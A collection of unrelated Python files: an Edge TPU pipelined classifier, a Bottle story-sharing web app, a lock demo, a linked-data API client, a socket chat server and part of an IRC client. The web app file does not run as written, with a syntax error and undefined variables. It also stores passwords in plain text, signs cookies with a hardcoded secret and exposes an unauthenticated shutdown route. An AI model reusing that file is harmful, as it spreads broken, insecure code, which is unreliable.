'Not enough Edge TPUs detected, expected %d, detected %d.' %
(num_devices, len(edge_tpus)))
num_pci_devices = sum(1 for device in edge_tpus if device['type'] == 'pci')
return ['pci:%d' % i for i in range(min(num_devices, num_pci_devices))] + [
'usb:%d' % i for i in range(max(0, num_devices - num_pci_devices))
]
def _make_runner(model_paths, devices):
"""Constructs PipelinedModelRunner given model paths and devices."""
print('Using devices: ', devices)
print('Using models: ', model_paths)
if len(model_paths) != len(devices):
raise ValueError('# of devices and # of model_paths should match')
interpreters = [make_interpreter(m, d) for m, d in zip(model_paths, devices)]
for interpreter in interpreters:
interpreter.allocate_tensors()
return pipeline.PipelinedModelRunner(interpreters)
def main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'-m',
'--models',
required=True,
help=('File path template of .tflite model segments, e.g.,'
'inception_v3_299_quant_segment_%d_of_2_edgetpu.tflite'))
parser.add_argument(
'-i', '--input', required=True, help='Image to be classified.')
parser.add_argument('-l', '--labels', help='File path of labels file.')
parser.add_argument(
'-k',
'--top_k',
type=int,
default=1,
help='Max number of classification results')
parser.add_argument(
'-t',
'--threshold',
type=float,
default=0.0,
help='Classification score threshold')
parser.add_argument(
'-c',
'--count',
type=int,
default=5,
help='Number of times to run inference')
args = parser.parse_args()
labels = read_label_file(args.labels) if args.labels else {}
result = re.search(r'^.*_segment_%d_of_(?P<num_segments>[0-9]+)_.*.tflite',
args.models)
if not result:
raise ValueError(
'--models should follow *_segment%d_of_[num_segments]_*.tflite pattern')
num_segments = int(result.group('num_segments'))
model_paths = [args.models % i for i in range(num_segments)]
devices = _get_devices(num_segments)
runner = _make_runner(model_paths, devices)
size = common.input_size(runner.interpreters()[0])
name = common.input_details(runner.interpreters()[0], 'name')
image = np.array(
Image.open(args.input).convert('RGB').resize(size, Image.ANTIALIAS))
def producer():
for _ in range(args.count):
runner.push({name: image})
runner.push({})
def consumer():
output_details = runner.interpreters()[-1].get_output_details()[0]
scale, zero_point = output_details['quantization']
while True:
result = runner.pop()
if not result:
break
values, = result.values()
scores = scale * (values[0].astype(np.int64) - zero_point)
classes = classify.get_classes_from_scores(scores, args.top_k,
args.threshold)
print('-------RESULTS--------')
for klass in classes:
print('%s: %.5f' % (labels.get(klass.id, klass.id), klass.score))
start = time.perf_counter()
producer_thread = threading.Thread(target=producer)
consumer_thread = threading.Thread(target=consumer)
producer_thread.start()
consumer_thread.start()
producer_thread.join()
consumer_thread.join()
average_time_ms = (time.perf_counter() - start) / args.count * 1000
print('Average inference time (over %d iterations): %.1fms' %
(args.count, average_time_ms))
if __name__ == '__main__':
main()
|
main.py
|
# -*- coding: utf-8 -*-
#qpy:main.py
#qpy:webapp:StoryChain
#qpy:fullscreen
#qpy://localhost:8080
"""
以上代码运行时将会用 WebView 以全屏模式打开 localhost:8080
"""
from bottle import template, request, response, redirect, HTTPResponse
from bottle import Bottle, ServerAdapter
from bottle import debug
import sqlite3
from os import path
from datetime import datetime
import sys
reload(sys)
sys.setdefaultencoding('utf8')
#import androidhelper
#Droid = androidhelper.Android()
#数据库
stories = 'storychain.db'
users = 'users.db'
#开启调试
debug(True)
#创建数据库
if not path.exists(stories):
import createstorydata
if not path.exists(users):
import createuserdata
root = path.dirname(path.abspath(__file__))
#/newuser /index: 判断重名
def checkdup(list, value):
check = False
for i in list:
print i
i = reduce(i,i)
if i == value:
check = True
break
return check
#/login: 检查用户名和密码
def check_login(u,p):
c = 0
up = (u, p)
userdata = sqlite3.connect(users)
uc = userdata.cursor()
check = False
while True:
uc.execute("SELECT count(count) FROM users")
maxcount = reduce(x, uc.fetchone())
uc.execute("SELECT userid, password FROM users WHERE count=?", (c,))
ups = uc.fetchone()
if c > maxcount:
userdata.commit()
break
elif ups == up:
check = True
userdata.commit()
else:
c += 1
return check
class MyWSGIRefServer(ServerAdapter):
server = None
def run(self, handler):
from wsgiref.simple_server import make_server, WSGIRequestHandler
if self.quiet:
class QuietHandler(WSGIRequestHandler):
def log_request(*args, **kw): pass
self.options['handler_class'] = QuietHandler
self.server = make_server(self.host, self.port, handler, **self.options)
self.server.serve_forever()
def stop(self):
#sys.stderr.close()
import threading
threading.Thread(target=self.server.shutdown).start()
#self.server.shutdown()
self.server.server_close() #<--- alternative but causes bad fd exception
print "# qpyhttpd stop"
def __exit():
global server
server.stop()
def __ping():
return 'ok'
def index():
user = request.get_cookie('account', secret='somekey')
conn = sqlite3.connect(stories)
cc=conn.cursor()
cc.execute("SELECT title, main FROM chains WHERE count=?", (0,))
ALL = cc.fetchall()
conn.commit()
temallstory = root+'/allstory')
output = template(temallstory, userid = user, rows = ALL, information='')
if request.GET.get('save'):
user = request.get_cookie('account',secret='somekey')
if not users:
output = template(temallstory, userid=user, rows = ALL, information='请登录')
else:
newtitle = unicode(request.GET.get('title'))
conn = sqlite3.connect(stories)
cc = conn.cursor()
cc.execute("SELECT title FROM chains")
AllTitle = cc.fetchall()
conn.commit()
if checkdup(AllTitle, newtitle):
output = template(temallstory, userid=user, rows = ALL, information='重名,请重新输入')
return output
else:
newurl='/'+newtitle
redirect (newurl)
if request.GET.get('exit'):
__exit()
return output
def body(name):
conn = sqlite3.connect(stories)
cc = conn.cursor()
t = unicode(name)
tembody = root+'/body.tpl'
if request.GET.get('save'):
user = request.get_cookie('account',secret='somekey')
if not user:
output = template(tembody, rows = result, title=name, information='请先登录!')
else:
new = unicode(request.GET.get('main'))
currentT = datetime.now()
ShowT = currentT.strftime('%Y-%m-%d %H:%M:%S')
cc.execute("SELECT title FROM chains")
AllTitle = cc.fetchall()
count = 0
if checkdup(AllTitle, t):
cc.execute("SELECT count(count) FROM chains WHERE title=?", (t,))
x=cc.fetchone()
count =reduce(x, x)
cc.execute("INSERT INTO chains VALUES(?,?,?,?,?)", (t, count, new,user,ShowT))
conn.commit()
cc.execute("SELECT * FROM chains WHERE title=? ORDER BY count", (t,))
result = cc.fetchall()
output = template(temallstory, rows = result, title=name,information='')
return output
def login():
return template(root+'/login', information='')
def do_login():
username = request.forms.get('username')
password = request.forms.get('password')
if check_login(username, password):
response.set_cookie('account',username, secret='somekey')
redirect('/index')
else:
return template(root+'/login', information='登录失败,请确认用户名和密码,或注册新账号')
def newuser(information=''):
return template(root+'/reg',information='')
def do_newuser():
username = request.forms.get('username')
password = request.forms.get('password')
confirm = request.forms.get('confirm')
userdata = sqlite3.connect(users)
uc = userdata.cursor()
uc.execute("SELECT userid FROM users")
alluser = uc.fetchall()
if checkdup(alluser, username):
return template(root+'/reg', information='该用户名已存在!')
elif password == confirm:
uc.execute("SELECT count(count) FROM users")
x = uc.fetchone()
Newcount = reduce(x, x)
uc.execute("INSERT INTO users VALUES(?,?,?)",
(Newcount, username, password))
userdata.commit()
redirect('/login')
else:
return template(root+'/reg', information='请确保两次输入的密码相同!')
#MyWSGIRefSever
if __name__ == '__main__':
app = Bottle()
app.route('/')(index)
app.route('/index', method='GET')(index)
app.route('/:name', method='GET')(body)
app.route('/login', method= 'GET')(login)
app.route('/login', method= 'POST')(do_login)
app.route('/newuser', method = 'GET')(newuser)
app.route('/newuser', method = 'POST')(do_newuser)
app.route('/__exit', method=['GET','HEAD'])(__exit) #自我结束功能
app.route('/__ping', method=['GET','HEAD'])(__ping) #健康监测
try:
server = MyWSGIRefServer(host="localhost", port="8080")
app.run(server=server,reloader=True)
except Exception,ex:
print "Exception: %s" % repr(ex)
|
lock_context_manager.py
|
"""
menggunakan lock/mutex untuk mengsinkronisasi akses ke shared resource
"""
import threading, time, random
counter = 0
lock = threading.Lock() # lock untuk mendapatkan akses ke shared resource
def worker(name):
global counter
for _ in range(10):
with lock: # lock resource, lock automatically release after block end
c = counter # critical code, possible race condition
time.sleep(random.random()) # critical code, possible race condition
counter = c + 1 # critical code, possible race condition
print(f"{name}: {counter}") # critical code, possible race condition
threads = []
for i in ['budi', 'susi', 'iwan']:
thread = threading.Thread(target=worker, args=(i,))
thread.start()
threads.append(thread)
for t in threads:
t.join()
print(f"counter: {counter}")
|
__init__.py
|
# -*- coding: utf-8 -*-
#
import asyncio
from abc import ABCMeta, abstractmethod
import aiohttp
import requests
import json
from pyldapi_client.functions import *
try:
import uvloop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
except ImportError:
pass
class LoadedRegister(object):
"""
TODO: Ashley
"""
__slots__ = ('uri', 'item_classes', 'payload')
def __init__(self, uri, item_classes=None, payload=None):
"""
TODO: Ashley
:param uri:
:type uri:
:param item_classes:
:type item_classes:
:param payload:
:type payload:
"""
self.uri = uri
self.item_classes = item_classes or []
self.payload = payload
def get_current_page_details(self):
"""
TODO: Ashley
:return:
:rtype:
"""
page = 1
per_page = 100
first = 1
last = 1
if not self.payload:
return page, per_page, first, last
for p in self.payload:
if "@type" in p and ldp_Page in p['@type']:
page_string = str(p['@id'])
ex_page = extract_page_from_string(page_string)
ex_per_page = extract_per_page_from_string(page_string)
page = ex_page or page
per_page = ex_per_page or per_page
if vocab_first in p and len(p[vocab_first]) > 0:
page_string = p[vocab_first][0]['@id']
ex_first_page = extract_page_from_string(page_string)
first = ex_first_page or first
if vocab_last in p and len(p[vocab_last]) > 0:
page_string = p[vocab_last][0]['@id']
ex_last_page = extract_page_from_string(page_string)
last = ex_last_page or last
break
return page, per_page, first, last
def make_instance_uri(self, identifier):
"""
TODO: Ashley
:param identifier:
:type identifier:
:return:
:rtype:
"""
if identifier.startswith("http:") or identifier.startswith("https:"):
pass
else:
identifier = "/".join([self.uri.rstrip('/'), identifier])
return identifier
def filter_index(self, payload):
"""
TODO: Ashley
:param payload:
:type payload:
:return:
:rtype:
"""
index = {}
for p in payload:
if "@id" not in p:
continue
if "@type" not in p:
continue
contained = False
for t in p['@type']:
if t in self.item_classes:
contained = True
break
if not contained:
continue
index[p["@id"]] = p
return index
class AbstractBoundIndexPage(object, metaclass=ABCMeta):
"""
TODO: Ashley
"""
__slots__ = ('register', 'index', 'page', 'per_page', 'first', 'last')
def __init__(self, register, index, page, per_page, first, last):
"""
TODO: Ashley
:param register:
:type register:
:param index:
:type index:
:param page:
:type page:
:param per_page:
:type per_page:
:param first:
:type first:
:param last:
:type last:
"""
self.register = register
self.index = index
self.page = page
self.per_page = per_page
self.first = first
self.last = last
def items(self):
"""
TODO: Ashley
:return:
:rtype:
"""
for k, i in self.index.items():
yield k, i
class BoundIndexPage(AbstractBoundIndexPage):
"""
TODO: Ashley
"""
__slots__ = tuple()
def prev_page(self):
"""
TODO: Ashley
:return:
:rtype:
"""
if self.page == 1 or self.page <= self.first:
return None
index = self.register.index_page(self.page - 1, self.per_page)
return index
def next_page(self):
"""
TODO: Ashley
:return:
:rtype:
"""
if self.page >= self.last:
return None
index = self.register.index_page(self.page + 1, self.per_page)
return index
class AsyncBoundIndexPage(AbstractBoundIndexPage):
"""
TODO: Ashley
"""
__slots__ = tuple()
async def prev_page(self):
"""
TODO: Ashley
:return:
:rtype:
"""
if self.page == 1 or self.page <= self.first:
return None
index = await self.register.index_page(self.page - 1, self.per_page)
return index
async def next_page(self):
"""
TODO: Ashley
:return:
:rtype:
"""
if self.page >= self.last:
return None
index = await self.register.index_page(self.page + 1, self.per_page)
return index
class AbstractBoundRegister(object, metaclass=ABCMeta):
"""
TODO: Ashley
"""
__slots__ = ('register', 'client')
def __init__(self, register, client):
"""
TODO: Ashley
:param register:
:type register:
:param client:
:type client:
"""
self.register = register
self.client = client
class AsyncBoundRegister(AbstractBoundRegister):
"""
TODO: Ashley
"""
__slots__ = tuple()
async def index(self, offset=None, min_count=None):
"""
Gets all of the IDs of instances on this register.
Note: this can take a long time for a large dataset
:return:
:rtype: dict
"""
current_page, current_per_page, first, last =\
self.register.get_current_page_details()
if last < first:
last = first
if last == first and offset is None:
page = await self.index_page(first)
return page.index
if offset and offset > 0:
offset_pages = offset // current_per_page
offset_entries = offset - (offset_pages * current_per_page)
first = first+offset_pages
last = last+offset_pages
else:
offset_entries = 0
# plus 1 because first and last are inclusive.
total_pages = (last - first) + 1
if total_pages < 1:
total_pages = 1
chunks = total_pages // 8
if chunks < 1:
chunks = 1
elif (total_pages % 8) > 0:
chunks += 1
index = {}
for c in range(chunks):
jobs = []
page_offset = c*8
for p in range(page_offset+first, page_offset+first+8):
page_job = self.index_page(page=p)
jobs.append(page_job)
awaitable = asyncio.gather(*jobs, return_exceptions=True)
pages = await awaitable
for p in pages:
if p is None:
continue
elif isinstance(p, Exception):
print(p)
continue
if offset_entries:
skip_entries = sorted(p.index.keys())[:offset_entries]
for s in skip_entries:
_ = p.index.pop(s)
offset_entries = 0
try:
index.update(p.index)
except Exception as e:
print(e)
continue
if min_count is not None and len(index) >= min_count:
break
return index
async def instances(self, index=None, min_count=None):
"""
Gets all of the instances on this register.
Note: this can take a *very* long time for a large dataset.
:return:
:rtype: dict
"""
if index is None:
index = await self.index()
if isinstance(index, dict):
index = tuple(index.keys())
instance_count = len(index)
chunks = instance_count // 8
if chunks < 1:
chunks = 1
elif (instance_count % 8) > 0:
chunks += 1
ret_dict = {}
async def _get_instance_for_key(_instance_uri):
nonlocal self
_instance = await self.instance(_instance_uri)
return _instance_uri, _instance
for c in range(chunks):
jobs = []
for p in range(0, 8):
_offset = (c*8)+p
if _offset >= instance_count:
break
instance_uri = index[_offset]
instance_job = _get_instance_for_key(instance_uri)
jobs.append(instance_job)
awaitable = asyncio.gather(*jobs, return_exceptions=True)
completed_jobs = await awaitable
for completed_job in completed_jobs:
identifier, instance = completed_job
if instance is None:
continue
elif isinstance(instance, Exception):
print(instance)
continue
try:
ret_dict[identifier] = instance
except Exception as e:
print(e)
continue
if min_count is not None and len(ret_dict) >= min_count:
break
return ret_dict
async def index_page(self, page=None, per_page=None):
"""
TODO: Ashley
:param page:
:type page:
:param per_page:
:type per_page:
:return:
:rtype:
"""
current_page, current_per_page, first, last = self.register.get_current_page_details()
if page is None:
page = current_page or 1
if per_page is None:
per_page = current_per_page or 100
first = first or 1
last = last or 1
if page < 1:
raise RuntimeError("Cannot execute an index call to register page less-than 1.")
if per_page < 1:
raise RuntimeError("Cannot execute an index call to register with items-per-page less-than 1.")
if page == current_page and per_page == current_per_page:
payload = self.register.payload
else:
payload = await self.client._get_register_index(self.register.uri, page, per_page)
if not payload:
return None
self.register.payload = payload
current_page, current_per_page, first, last = self.register.get_current_page_details()
index = self.register.filter_index(payload)
return AsyncBoundIndexPage(self, index, current_page, current_per_page, first, last)
async def instance(self, identifier):
"""
TODO: Ashley
:param identifier:
:type identifier:
:return:
:rtype:
"""
id_uri = self.register.make_instance_uri(identifier)
resp = await self.client._get_register_instance(self.register.uri, id_uri)
return resp
class BoundRegister(AbstractBoundRegister):
"""
TODO: Ashley
"""
__slots__ = tuple()
def _index_threaded(self, first, last, offset_entries, min_count):
"""
Gets all of the ids of instances on this register.
Note: this can take a long time for a large dataset.
:return:
:rtype: dict
"""
# plus 1 because first and last are inclusive.
num_threads = int(self.client.threads)
total_pages = (last - first) + 1
if total_pages < 1:
total_pages = 1
chunks = total_pages // num_threads
if chunks < 1:
chunks = 1
elif (total_pages % num_threads) > 0:
chunks += 1
index = {}
import threading
pages = {}
def _thread_job(i, p):
nonlocal self
nonlocal pages
try:
result = self.index_page(page=p)
pages[i] = result
except Exception as e:
pages[i] = e
for c in range(chunks):
jobs = []
c_page_offset = c*8
pages = {}
for i, p in enumerate(range(c_page_offset+first, c_page_offset+first+num_threads)):
page_job = threading.Thread(target=_thread_job, args=(i, p))
page_job.start()
jobs.append(page_job)
for j in jobs:
try:
j.join()
except Exception:
pass
for i, p in pages.items():
if p is None:
continue
elif isinstance(p, Exception):
print(p)
continue
if offset_entries:
skip_entries = sorted(p.index.keys())[:offset_entries]
for s in skip_entries:
_ = p.index.pop(s)
offset_entries = 0
try:
index.update(p.index)
except Exception as e:
print(e)
continue
if min_count is not None and len(index) >= min_count:
break
return index
def index(self, offset=None, min_count=None):
"""
Gets all of the ids of instances on this register
Note: this can take a long time for a large dataset
:return:
:rtype: dict
"""
current_page, current_per_page, first, last =\
self.register.get_current_page_details()
if last < first:
last = first
if last == first and offset is None:
return self.index_page(first).index
if offset and offset > 0:
offset_pages = offset // current_per_page
offset_entries = offset - (offset_pages * current_per_page)
first = first+offset_pages
last = last+offset_pages
else:
offset_entries = 0
if self.client.threads and self.client.threads > 1:
return self._index_threaded(first, last, offset_entries, min_count)
index = {}
for p in range(first, last+1):
page = self.index_page(page=p)
if page is None:
continue
elif isinstance(page, Exception):
print(page)
continue
if offset_entries:
skip_entries = sorted(page.index.keys())[:offset_entries]
for s in skip_entries:
_ = page.index.pop(s)
offset_entries = 0
try:
index.update(page.index)
except Exception as e:
print(e)
continue
if min_count is not None and len(index) >= min_count:
break
return index
def instances(self, index=None, min_count=None):
"""
Gets all of the instances on this register.
Note: this can take a *very* long time for a large dataset.
:return:
:rtype: dict
"""
if index is None:
index = self.index()
if isinstance(index, dict):
index = tuple(index.keys())
if self.client.threads and self.client.threads > 1:
return self._instances_threaded(index, min_count)
instance_count = len(index)
ret_dict = {}
for p in range(0, instance_count):
instance_uri = index[p]
instance = self.instance(instance_uri)
if instance is None:
continue
elif isinstance(instance, Exception):
print(instance)
continue
try:
ret_dict[instance_uri] = instance
except Exception as e:
print(e)
continue
if min_count is not None and len(ret_dict) >= min_count:
break
return ret_dict
def _instances_threaded(self, index, min_count):
"""
Gets all of the instances on this register.
Note: this can take a *very* long time for a large dataset.
:return:
:rtype: dict
"""
num_threads = int(self.client.threads)
if isinstance(index, dict):
index = tuple(index.keys())
instance_count = len(index)
chunks = instance_count // num_threads
if chunks < 1:
chunks = 1
elif (instance_count % num_threads) > 0:
chunks += 1
ret_dict = {}
import threading
instances = {}
def _get_instance_for_key(i, _instance_uri):
nonlocal self
nonlocal instances
try:
_instance = self.instance(_instance_uri)
instances[_instance_uri] = _instance
except Exception as e:
instances[_instance_uri] = e
for c in range(chunks):
jobs = []
instances = {}
for i, p in enumerate(range(0, num_threads)):
_offset = (c*8)+p
if _offset >= instance_count:
break
instance_uri = index[_offset]
instance_job = threading.Thread(target=_get_instance_for_key, args=(i, instance_uri))
instance_job.start()
jobs.append(instance_job)
for j in jobs:
try:
j.join()
except Exception:
pass
for identifier, instance in instances.items():
if instance is None:
continue
elif isinstance(instance, Exception):
print(instance)
continue
try:
ret_dict[identifier] = instance
except Exception as e:
print(e)
continue
if min_count is not None and len(ret_dict) >= min_count:
break
return ret_dict
def index_page(self, page=None, per_page=None):
"""
TODO: Ashley
:param page:
:type page:
:param per_page:
:type per_page:
:return:
:rtype:
"""
current_page, current_per_page, first, last = self.register.get_current_page_details()
if page is None:
page = current_page or 1
if per_page is None:
per_page = current_per_page or 100
first = first or 1
last = last or 1
if page < 1:
raise RuntimeError("Cannot execute an index call to register page less-than 1.")
if per_page < 1:
raise RuntimeError("Cannot execute an index call to register with items-per-page less-than 1.")
if page == current_page and per_page == current_per_page:
payload = self.register.payload
else:
payload = self.client._get_register_index(self.register.uri, page, per_page)
if not payload:
return None
self.register.payload = payload
current_page, current_per_page, first, last = self.register.get_current_page_details()
index = self.register.filter_index(payload)
return BoundIndexPage(self, index, current_page, current_per_page, first, last)
def instance(self, identifier):
"""
TODO: Ashley
:param identifier:
:type identifier:
:return:
:rtype:
"""
uri = self.register.make_instance_uri(identifier)
resp = self.client._get_register_instance(self.register.uri, uri)
return resp
class AbstractLDAPIClient(object, metaclass=ABCMeta):
"""
TODO: Ashley
"""
__slots__ = ('base_uri', 'url_remapper', '_registers', 'session')
def __init__(self, base_uri, *args, url_remapper=None, **kwargs):
"""
TODO: Ashley
:param base_uri:
:type base_uri:
:param args:
:type args:
:param url_remapper:
:type url_remapper:
:param kwargs:
:type kwargs:
"""
self.base_uri = base_uri
self.url_remapper = url_remapper
self._registers = {}
self.session = requests.Session()
self._populate_registers()
@abstractmethod
def _populate_registers(self):
"""
TODO: Ashley
:return:
"""
pass
def _remap_url(self, url):
"""
TODO: Ashley
:param url:
:type url:
:return:
"""
if self.url_remapper is None:
return url
for u, v in self.url_remapper.items():
if url.startswith(u):
url = url.replace(u, v)
break
return url
@abstractmethod
def register(self, reg_uri):
"""
TODO: Ashley
:param reg_uri:
:type reg_uri:
:return:
:rtype:
"""
pass
class LDAPIClient(AbstractLDAPIClient):
"""
TODO: Ashley
"""
__slots__ = ('threads',)
def __new__(cls, *args, asynchronous=False, **kwargs):
"""
TODO: Ashley
:param args:
:type args:
:param asynchronous:
:type asynchronous:
:param kwargs:
:type kwargs:
:return:
:rtype:
"""
if asynchronous:
return AsyncLDAPIClient(*args, **kwargs)
self = super(LDAPIClient, cls).__new__(cls)
return self
def __init__(self, base_uri, *args, url_remapper=None,
threads=1, **kwargs):
"""
:param base_uri:
:type base_uri:
:param args:
:type args:
:param url_remapper:
:type url_remapper:
:param threads:
:type threads:
:param kwargs:
:type kwargs:
"""
super(LDAPIClient, self).__init__(
base_uri, *args, url_remapper=url_remapper, **kwargs)
self.threads = threads
def register(self, reg_uri):
"""
TODO: Ashley
:param reg_uri:
:type reg_uri:
:return:
:rtype:
"""
try:
register = self._registers[reg_uri]
except KeyError as k:
raise ValueError(*k.args)
return BoundRegister(register, client=self)
def _get_register_instance(self, register_uri, instance_uri):
"""
TODO: Ashley
:param register_uri:
:type register_uri:
:param instance_uri:
:type instance_uri:
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(instance_uri)
resp = self.session.get(url, headers=headers)
if resp.status_code == 404:
raise RuntimeError((404, instance_uri))
elif resp.status_code == 500:
raise RuntimeError((500, instance_uri))
if resp.status_code != 200:
return resp.status_code
text = resp.text
payload = json.loads(text)
return payload
def _get_register_index(self, register_uri, page=1, per_page=100):
"""
TODO: Ashley
:param register_uri:
:type register_uri:
:param page:
:type page:
:param per_page:
:type per_page:
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(register_uri)
resp = self.session.get(
url, headers=headers,
params={'page': page, 'per_page': per_page},
timeout=900
)
if resp.status_code != 200:
return None
text = resp.text
payload = json.loads(text)
return payload
def _populate_registers(self):
"""
TODO: Ashley
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(self.base_uri)
response = self.session.get(url, headers=headers)
if response.status_code != 200:
raise RuntimeError("Cannot get base register.")
text = response.text
json_struct = json.loads(text)
registers = find_registers_from_ld_payload(self.base_uri, json_struct, LoadedRegister)
first_registers = list(registers.keys())
for uri in first_registers:
r = registers[uri]
if not r.payload:
url = self._remap_url(uri)
response = self.session.get(url, headers=headers)
if response.status_code != 200:
raise RuntimeError("Cannot get linked register: {}".format(uri))
text = response.text
json_struct = json.loads(text)
new_registers = find_registers_from_ld_payload(uri, json_struct, LoadedRegister)
registers.update(new_registers)
self._registers = registers
def close(self):
self.session.close()
class AsyncLDAPIClient(AbstractLDAPIClient):
"""
TODO: Ashley
"""
__slots__ = ('_loop',)
def __new__(cls, *args, loop=None, **kwargs):
"""
TODO: Ashley
:param args:
:type args:
:param loop:
:type loop:
:param kwargs:
:type kwargs:
:return:
:rtype:
"""
if loop is None:
loop = asyncio.get_event_loop()
self = super(AsyncLDAPIClient, cls).__new__(cls)
self._loop = loop
asyncio.set_event_loop(loop)
return self.__async_init__(*args, **kwargs)
def __init__(self, *args, **kwargs):
"""
TODO: Ashley
:param args:
:type args:
:param kwargs:
:type kwargs:
"""
# deliberately don't call super init here, because we use an async init
object.__init__(self)
def register(self, reg_uri):
"""
TODO: Ashley
:param reg_uri:
:type reg_uri:
:return:
:rtype:
"""
try:
register = self._registers[reg_uri]
except KeyError as k:
raise ValueError(*k.args)
return AsyncBoundRegister(register, client=self)
async def _get_register_instance(self, register_uri, instance_uri):
"""
TODO: Ashley
:param register_uri:
:type register_uri:
:param instance_uri:
:type instance_uri:
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(instance_uri)
resp = await self.session.get(url, headers=headers)
if resp.status != 200:
return resp.status
text = await resp.text()
payload = json.loads(text)
return payload
async def _get_register_index(self, register_uri, page=1, per_page=100):
"""
TODO: Ashley
:param register_uri:
:type register_uri:
:param page:
:type page:
:param per_page:
:type per_page:
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(register_uri)
resp = await self.session.get(
url, headers=headers,
params={'page': page, 'per_page': per_page},
timeout=900
)
if resp.status != 200:
return None
text = await resp.text()
payload = json.loads(text)
return payload
async def _populate_registers(self):
"""
TODO: Ashley
:return:
:rtype:
"""
headers = {
"Accept": "application/ld+json",
"Accept-Profile": "http://purl.org/linked-data/registry"
}
url = self._remap_url(self.base_uri)
response = await self.session.get(url, headers=headers)
if response.status != 200:
raise RuntimeError("Cannot get base register.")
text = await response.text()
json_struct = json.loads(text)
registers = find_registers_from_ld_payload(self.base_uri, json_struct, LoadedRegister)
first_registers = list(registers.keys())
for uri in first_registers:
r = registers[uri]
if not r.payload:
url = self._remap_url(uri)
response = await self.session.get(url, headers=headers, params={"per_page": 1})
if response.status != 200:
raise RuntimeError("Cannot get linked register: {}".format(uri))
text = await response.text()
json_struct = json.loads(text)
new_registers = find_registers_from_ld_payload(uri, json_struct, LoadedRegister)
registers.update(new_registers)
self._registers = registers
async def __async_init__(self, base_uri, *args, url_remapper=None, **kwargs):
"""
TODO: Ashley
:param base_uri:
:type base_uri:
:param args:
:type args:
:param url_remapper:
:type url_remapper:
:param kwargs:
:type kwargs:
:return:
:rtype:
"""
self.base_uri = base_uri
self.url_remapper = url_remapper
self._registers = {}
self.session = aiohttp.ClientSession()
await self._populate_registers()
return self
async def close(self):
"""
TODO: Ashley
:return:
:rtype:
"""
r = await self.session.close()
return r
@property
def loop(self):
"""
TODO: Ashley
:return:
:rtype:
"""
return self._loop
__all__ = ['LDAPIClient']
|
server.py
|
import socket
import threading
PORT = 9090
HOST = socket.gethostbyname(socket.gethostname()) #local host
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((HOST, PORT))
clients = []
def start():
"""
Thread to accept clients
:return: None
"""
server.listen()
print("[SERVER] Server is listening now...")
while True:
try:
client_socket, address = server.accept()
clients.append(client_socket)
print(f"{address} is connected")
thread = threading.Thread(target=client_handle , args=(client_socket,))
thread.start()
except Exception as e:
print("[EXCEPTIO]", e)
def client_handle(client_socket):
"""
Handle messages from the client
:param client_socket: socket
:return: None
"""
try:
name = client_socket.recv(1024).decode('utf-8')
broadcast(f"{name} is connected now! :", "")
while True:
msg = client_socket.recv(1024).decode('utf-8')
if msg == 'exit':
clients.remove(client_socket)
broadcast(f"{name} has left the room! :", "")
break
else:
broadcast(msg, name)
except Exception as e:
print('[EXCEPTION]', e)
client_socket.close()
def broadcast(message, name):
"""
send messages to all clients
:param message: str
:param name: str
:return: None
"""
for client in clients:
try:
client.send(f'{name} : {message}'.encode('utf-8'))
except:
print('[EXCEPTION ON BROADCAST]')
if __name__ == '__main__':
start()
|
irc.py
|
"""Easy to use module for connection to IRC."""
from __future__ import annotations
import logging
import textwrap
import threading
from logging import Logger
from queue import Queue
from threading import Event, Thread
from time import sleep
from typing import Generator, Optional, Set, Type
from irc.exception import IRCConnectionException, IRCException, IRCSocketClosedException, IRCSocketException
from irc.messages import IRCBaseMessage, IRCControlMessage, IRCMessage
from irc.socket import Socket
# Many IRC servers will kick the user if it does not reply for about 240s
# It is also common for them to send PING messages to ensure that the
# socket is alive, every 90s or so. Using 300s as a hard timeout ensures that we will
# handle PING messages in time, but still disconnect quite fast if there
# is an issue with the socket
default_timeout = 300
version = "1.0.0"
class IRC: # pylint: disable=too-many-instance-attributes,too-many-arguments
"""IRC connector."""
def __init__(
self,
server: str,
port: int,
user: str,
nick: str,
gecos: str = "",
timeout: float = default_timeout,
use_tls: bool = False,
logger: Optional[Logger] = None
) -> None:
self.__timeout = timeout
self.__logger = logging.getLogger(__name__) if logger is None else logger
self.__socket = Socket(server, port, timeout, logger=self.__logger, use_tls=use_tls)
self.__user = user
self.__nick = nick
self.__gecos = gecos
self.__channels: Set[str] = set()
# Create a thread and event handler for ingress messages
self.__ingress_thread_should_run = Event()
self.__ingress_thread = Thread(target=self.__handle_ingress_messages)
self.__ingress_thread.daemon = True
# Queue of parsed messages received from the server
self.__ingress_messages: Queue[IRCBaseMessage] = Queue() # pylint: disable=unsubscriptable-object
# Create a thread and event handler for egress messages
self.__egress_thread_should_run = Event()
self.__egress_thread = Thread(target=self.__handle_egress_messages)
self.__egress_thread.daemon = True
# Queue of raw messages to send to the server
self.__egress_messages: Queue[bytes] = Queue() # pylint: disable=unsubscriptable-object
@property
def messages(self) -> Generator[IRCBaseMessage, None, None]:
"""A generator containing all received messages as they come."""
while True:
message = self.__ingress_messages.get()
self.__ingress_messages.task_done()
yield message
@property
def version(self) -> str:
"""The version of the IRC library."""
return version
def connect(self) -> None:
"""Connect to the server."""
if self.__ingress_thread_should_run.is_set() or self.__egress_thread_should_run.is_set():
raise IRCConnectionException("Already connected")
# Connect the underlaying socket
self.__logger.info("Connecting to server")
self.__socket.connect()
self.__logger.info("Connected to server")
self.login()
# Start the ingress thread
self.__logger.info("Starting ingress thread")
self.__ingress_thread_should_run.set()
self.__ingress_thread.start()
# Start the egress thread
self.__logger.info("Starting egress thread")
self.__egress_thread_should_run.set()
self.__egress_thread.start()
def login(self) -> None:
"""Login to the server."""
self.__logger.info("Logging in")
self.send("User {0} {0} {0} :{1}\r\n".format(self.__user, self.__gecos))
self.send("NICK {0}\r\n".format(self.__nick))
